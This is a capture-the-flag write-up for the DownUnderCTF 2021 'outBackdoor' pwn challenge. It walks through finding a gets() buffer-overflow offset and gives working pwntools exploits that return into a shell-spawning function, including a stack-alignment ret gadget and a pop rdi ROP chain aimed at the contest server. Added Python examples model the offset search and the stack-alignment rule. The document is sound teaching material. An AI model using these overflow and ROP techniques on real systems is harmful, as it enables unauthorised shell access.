DownUnderCTF 2021 : outBackdoor PWN (Ret2win)
A fairly easy challenge in the PWN category. Let me explain how I solved this challenge.
First, we check the file type and the memory protection involved with the binary.
We can see this is a 64-bit binary, dynamically linked and not stripped, which makes our life easier. The NX bit is enabled, so we cannot execute anything on the stack. Let’s look at the functions.
We have our main() and a suspicious-looking outBackdoor() function. First, let’s disassemble main() and see what’s vulnerable there.
We have a call to gets(), which is vulnerable to buffer overflow because it reads input with no length limit. We just need to find the offset that overflows the buffer and the saved RBP to reach the RIP/return address. For this, I use pattern create and pattern offset in gdb-peda and then check the RBP register.
We can see that RBP has been overwritten with “AACAA-AA”. We look up this value in the pattern we gave with pattern offset and add 8 (the size of the saved RBP) to get the offset of the RIP/return address.
Adding 8 to the reported offset gives 24. So 24 junk characters overflow the buffer and reach the RIP/return address slot.
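As an added example (my own code, not the write-up’s), here is the pattern create / pattern offset recipe in plain Python with no pwntools or gdb-peda dependency: generate a de Bruijn pattern, model what gets() leaves in the saved-RBP and return-address slots of main()’s frame, and recover the 24-byte offset from the RBP contents the way the write-up does. The 16-byte buffer size and the lowercase alphabet are assumptions (peda uses its own character set); the 16-byte buffer is what the write-up’s 24-byte offset implies.

```python
import string

# Added example (not the write-up's code): the pattern-create / pattern-offset
# recipe in plain Python, with no pwntools or gdb-peda dependency.

ALPHABET = string.ascii_lowercase  # assumption: a simple alphabet; peda uses its own charset


def cyclic_pattern(length=200, n=4, alphabet=ALPHABET):
    """De Bruijn sequence: every n-character window occurs exactly once, so any
    register value captured after a crash maps back to a unique offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= length:          # stop as soon as we have enough characters
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq[:length])


BUFFER_SIZE = 16  # constructed: the buffer size the write-up's 24-byte offset implies (24 - 8 for saved RBP)


def simulate_gets_overflow(pattern, buffer_size=BUFFER_SIZE):
    """Constructed model of main()'s frame after gets() copies `pattern` into it:
    [buffer][saved RBP][return address]. Returns the 8 bytes that land in the
    saved-RBP slot and in the return-address slot, i.e. what gdb shows in RBP
    and at the faulting address."""
    saved_rbp = pattern[buffer_size:buffer_size + 8]
    ret_slot = pattern[buffer_size + 8:buffer_size + 16]
    return saved_rbp, ret_slot


def pattern_offset(pattern, value):
    """Equivalent of peda's `pattern offset`: where in the pattern did this value come from?"""
    off = pattern.find(value)
    if off < 0:
        raise ValueError(f"{value!r} is not part of the pattern")
    return off


def return_address_offset(pattern, rbp_value):
    """The write-up's recipe: offset of RBP's contents plus 8 for the saved RBP itself."""
    return pattern_offset(pattern, rbp_value) + 8


if __name__ == "__main__":
    pat = cyclic_pattern()
    rbp, rip = simulate_gets_overflow(pat)
    print("RBP after crash :", rbp)
    print("pattern offset  :", pattern_offset(pat, rbp))
    print("padding to RIP  :", return_address_offset(pat, rbp), "bytes")
    # the value that landed in the return-address slot confirms the same offset
    assert return_address_offset(pat, rbp) == pattern_offset(pat, rip)
```

The same `pattern_offset` lookup works for whatever register you read after the crash; the `+ 8` is specific to reading RBP on a 64-bit target, where the saved RBP sits right below the return address.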
Now let’s disassemble outBackdoor().
We can see a call to system(). But let’s see what argument it is called with. For this, I used Ghidra to make it much easier.
We can see that it calls system(“/bin/sh”). So this is a basic ret2win challenge: we just have to overwrite the buffer up to the RIP region and return into the outBackdoor() function. I tried it on my local machine first. Here is my exploit:
from pwn import *

win = p64(0x00000000004011d7)  # address of outBackdoor()
overwrite = b"A" * 24          # padding up to the return address
payload = overwrite + win
p = process("./outBackdoor")
p.sendline(payload)
p.interactive()
Running this code pops us the shell.
So now it’s simple: run the same code, changing the target from the local binary to their server.
from pwn import *

win = p64(0x00000000004011d7)  # address of outBackdoor()
overwrite = b"A" * 24          # padding up to the return address
payload = overwrite + win
#p = process("./outBackdoor")  # Local
p = remote("pwn-2021.duc.tf", 31921)  # Server
p.sendline(payload)
p.interactive()
Unfortunately…
I got an EOF while running this code. This is a common problem on Ubuntu-based machines.
The cause is stack alignment: the x86-64 ABI guarantees that RSP is 16-byte aligned plus 8 at every function entry, and returning straight into outBackdoor() from the overflow leaves RSP off by 8. system() in modern glibc executes an SSE instruction (movaps) on the stack that requires that alignment, so the process crashes and we see EOF. The fix is to add a “ret” gadget after the overwrite and before the win address: the extra ret pops 8 bytes and realigns the stack. We can find a suitable ret gadget for our exploit using ROPgadget.
from pwn import *

win = p64(0x00000000004011d7)  # address of outBackdoor()
overwrite = b"A" * 24          # padding up to the return address
ret = p64(0x0000000000401016)  # ret gadget from ROPgadget, realigns the stack
payload = overwrite + ret + win
#p = process("./outBackdoor")
p = remote("pwn-2021.duc.tf", 31921)
p.sendline(payload)
p.interactive()
Running this popped the shell and we got our flag!
There we go!
Here is an alternate solution to this if you had problems with that “ret”.
from pwn import *

overwrite = b"A" * 24                   # padding up to the return address
poprdi = p64(0x000000000040125b)        # pop rdi; ret gadget, got from ROPgadget
binsh = p64(0x4020cd)                   # used find "/bin/sh" in gdb-peda
system = p64(0x00000000004011f3)        # got from the outBackdoor() function
ret = p64(0x0000000000401016)           # got from ROPgadget (not used in this chain)
payload = overwrite + poprdi + binsh + system
p = remote("pwn-2021.duc.tf", 31921)
p.sendline(payload)
p.interactive()
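Why the plain ret2win payload dies with EOF while both the ret-padded chain and this pop rdi chain work comes down to the stack-alignment rule described above. The following added example (my own code, not the write-up’s) models RSP modulo 16 for the three payloads, from the moment main()’s ret hands control to our first address until system() is entered. It assumes the address labelled system in the last chain is the call system instruction inside outBackdoor(), which is how the write-up’s comment reads; the instruction sequences are a constructed model, not a trace of the binary.

```python
# Added example (not the write-up's code): a model of x86-64 stack alignment for
# the three payloads in this write-up.
#
# SysV ABI: at a function's entry RSP % 16 == 8, because `call` pushed an
# 8-byte return address onto a 16-byte-aligned stack. glibc's system() relies
# on that (it uses movaps on stack slots), so entering it with RSP % 16 == 0
# faults, and pwntools reports the dead process as EOF.

# Effect of each instruction we care about on RSP, in bytes.
STACK_DELTA = {
    "ret": +8,    # pops the return address
    "pop": +8,    # e.g. pop rdi
    "push": -8,   # e.g. push rbp in a prologue
    "call": -8,   # pushes the return address
}

# When main()'s ret transfers control to the first address in our payload,
# RSP % 16 == 0: it was 8 at main's entry, push rbp made it 0, leave made it 8,
# and ret made it 0 again.
RSP_AFTER_MAIN_RET = 0


def rsp_at_system_entry(steps, rsp=RSP_AFTER_MAIN_RET):
    """Walk the instruction sequence and return RSP % 16 when system() is entered."""
    for step in steps:
        rsp = (rsp + STACK_DELTA[step]) % 16
    return rsp


def system_entry_is_aligned(steps):
    """True when system() sees the RSP % 16 == 8 the ABI promises it."""
    return rsp_at_system_entry(steps) == 8


# The three payloads, as the instructions executed between main()'s ret and
# the entry of system() (constructed model, assumptions noted in the lead-in):
PAYLOADS = {
    # overwrite + win: outBackdoor's prologue (push rbp), then its call system
    "ret2win_direct": ["push", "call"],
    # overwrite + ret + win: the ret gadget pops 8 bytes before outBackdoor runs
    "ret2win_with_ret": ["ret", "push", "call"],
    # overwrite + poprdi + binsh + system: pop rdi; ret; then the call system
    # instruction inside outBackdoor (assumed meaning of the `system` address)
    "pop_rdi_chain": ["pop", "ret", "call"],
}


def check_all():
    """Alignment verdict for every payload, keyed by name."""
    return {name: system_entry_is_aligned(steps) for name, steps in PAYLOADS.items()}


if __name__ == "__main__":
    for name, steps in PAYLOADS.items():
        verdict = "OK" if system_entry_is_aligned(steps) else "misaligned -> crash/EOF"
        print(f"{name:18s} RSP%16 at system() entry = {rsp_at_system_entry(steps)}  {verdict}")
```

The model also explains why the alternate chain needs no separate ret gadget: pop rdi plus its ret move RSP by 16 bytes, which leaves the alignment unchanged, and jumping to the call instruction rather than to outBackdoor()’s entry skips the push rbp that threw the direct payload off.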
Hope you understood the challenge. Do check out my other blogs.
Don’t forget to give some claps if you reached here :) Follow me for more write-ups.
Goodbye:)